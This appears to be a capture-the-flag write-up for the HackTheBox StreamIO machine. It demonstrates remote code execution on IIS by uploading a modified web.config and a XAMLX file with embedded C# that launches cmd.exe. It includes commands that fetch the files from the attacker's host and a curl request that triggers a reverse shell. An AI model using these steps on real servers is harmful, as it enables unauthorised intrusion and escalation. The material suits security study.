Remote Code Execution in IIS Servers with XAMLX files
In this article I will be going through a technique which allows us to execute commands in MS IIS Servers when files such .ASP and .ASPX are disabled.
For this demo, I will be using the StreamIO box from hackthebox. This was a Medium difficulty, Windows box which had an unintended privilege escalation method of getting administrator using this technique.
NOTE: This unintended was originally showcased by xct, in his walkthrough of the box.
What is an XAMLX file?
This is a special file type that can be used to define workflow services in windows. These workflow activities allows you to send and receive messages from within a workflow. This specifies activities to be implemented by a program and is used for defining how a remote service program runs.
These files can be used to execute system commands upon called through the MS IIS server.
Prerequisites for the Attack
For this attack to be possible, we need a way to upload/write files to the web root ( C:\inetpub\wwwroot )of the IIS server. Also either the .xamlx file extension should be allowed through the HTTP Activation feature of WCF Services under .NET Framework or should be enabled.
In our case, we will be enabling the extension by uploading a new web.config file to the web root. The way we do that is by telling our config to add the .xamlx file extension to allowed extensions.
<add name="xamlx" path="*.xamlx" verb="*" type="System.Xaml.Hosting.XamlHttpHandlerFactory, System.Xaml.Hosting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" modules="ManagedPipelineHandler" requireAccess="Script" preCondition="integratedMode" /> <add name="xamlx-Classic" path="*.xamlx" verb="*" modules="IsapiModule" scriptProcessor="%windir%\Microsoft.NET\Framework64\v4.0.30319\aspnet_isapi.dll" requireAccess="Script" preCondition="classicMode,runtimeVersionv4.0,bitness64" />
Once that’s done, we need to create our XAMLX file which will execute commands for us. This file takes the format of XML files. Inside, it uses special tag called <mca:CSharpValue> that allows to execute C# code.
<mca:CSharpValue x:TypeArguments="sd:Process">/*/System.Diagnostics.Process.Start("");return base.RewriteExpressionTree(expression);} System.Diagnostics.Process x =System.Diagnostics.Process.Start("cmd.exe", "/c calc"); [System.Diagnostics.DebuggerHiddenAttribute()] public System.Diagnostics.Process @__Expr0Get() {return x;</mca:CSharpValue>You can find the full versions of the XAMLX file and the web.config file below.
Here in the a.xamlx file I have used a base64 encoded powershell payload to get a reverse shell to listener on 10.10.14.43:9090 Make sure you edit your payload accordingly.
Exploitation
I have a low privileged shell on the box as the yoshihide user with no any interesting privileges.
whoami /priv
But this user has write access over the the web root of the IIS server.
icacls C:\inetpub\wwwroot
Now we need to upload the XAMLX file and the web.config files to the web root. I am hosting them in my webserver on port 8080 I will use iwr (Invoke-WebRequest) to transfer the files.
powershell iwr http://10.10.14.43:8080/web.config -outfile \inetpub\wwwroot\web.configiwr http://10.10.14.43:8080/a.xamlx -outfile \inetpub\wwwroot\a.xamlx
After files are in place, we need to do a POST request to our XAMLX file. Couple of things to keep in mind are to set the Content-type to text/xml and to set the SOAPAction header.
curl http://streamio.htb/a.xamlx -X POST \
-H 'Content-Type: text/xml' \
-H 'SOAPAction: testme' \
-d '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body/></s:Envelope>'Once I executed the curl, I got a connection to my listener. But it was as the yoshihide user. Even though, if we look at the privileges we have now, we see that we have SeImpersonatePrivilege
This SeImpersonatePrivilege privilege can be exploited by using something like juicy potato or Sweet Potato to get Administrative access to the system.
